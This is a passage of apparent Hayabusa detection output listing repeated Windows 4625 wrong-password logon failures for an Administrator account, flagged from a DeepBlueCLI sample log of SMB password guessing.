NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 57qCysbeaXx12CbY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xyJl4mHvgtTv53d9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jGBDZCtot2ogcKIO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bBhmbqZIi1gX62mM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o7d4bcBJV1jlRgdt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FtfFb6hMHJiFXxai : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: frlsZMDcdb5WaW99 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CFV8UiUTRCCfab9l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZI8P6ZeVRmQlbGtz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UmJI7S1nj5hfWZqv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: veh8XInSzXe8E9UD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a1BuBHLILZ4afwJC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NN2h7CHnGSCQZXan : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BU3fxfM1qGBJ55HS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.802 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1OlBmhUABabDQbN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6DgQtHG7cT05kRXd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.890 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EUTe3JqVWgDcDcOS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nGKgUOyX3USQlESB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:33.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rcIJ8keQvgax1SuL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A7jsyA7bWtVf4sLr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mijnM28fwbgWzkvp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o6dNmJo7vkacqxA6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.155 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FxvD2OWtadDT1Q2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WK8Esc50KVWIsLU5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U07NeCzXSdx5Nlgs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tObVl72GJse2HCGp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nbEnp2E5a3N78OBC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IlRmyinJLWwj5yQg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.438 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 92H7tdXinUOxtOLV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Za42EUNuitIXaMBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kz7OtswOreS0fdeS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VMxY1IHx5VuvskM7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.667 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d6uxMqLCcqHkuesV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TmeAWYvFEbqJp1rt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.826 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8tGAdT1CBRYRatVA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:34.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K0h9ulMPWtj8bEKI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eLyLMNv6cOp3sgrq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.098 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KIAOs16X8nFxV45x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z4EbyEaUxUEyuiY6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SDnW5GABBLbe6eZ7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GublgQLD3RXQNmkX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BQRppHTUHAoWPe4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gnh6HFlIW1zWEBu5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.402 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ulbcy5PWLYUm5Sy0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L8rkZ7iBMam5o8VJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n39Zox0PFeNirzyT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3u3YUCKxEo5pnKJX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wen3pHM88kSRkHNf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dGDHJ4KMm2zEMV0b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lKZAB1nfXPYSLxsE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tYkOsX0XDpkdvp01 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.779 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r9y7HjOeGPcrdj1c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.823 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RLwh8Lg3nvbm8Q2p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QoMkBcp8ouIgpX4m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2UnrDiOAOec5DQGQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:35.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UxJGLShj5EDKLSDZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iWhaz8W0VLQdXKWN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 82YDxSIBnCAqdK4c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 795b7XqsxokIGJyM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1BmnyTsmP2XqMzf1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NB3xsYe3RcPXhDib : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yxN9i8exdO2h4oa7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vjcQaeuo4f8wFXhv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.351 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zCzr77BhliB4KKeb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z558005RepKaO1zZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.448 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9HFzW25mJz4JLkv7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.490 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y7J8m97GQWt2cbSs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJrVwcpABBaZ8cyY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VcDw3I4BaFLdIeCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: egEpV9aAuCFjwx2I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: th0ZLWF4YeOaNnkK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ahrOLfdy6DCQ9SfO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xiooSdP5eib8PUE3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s6nQ2jp9IGYnGeyD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:36.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ejMtyR5QNdJFhw1W : IP Address: 192.168.198.149 : AuthPackage: 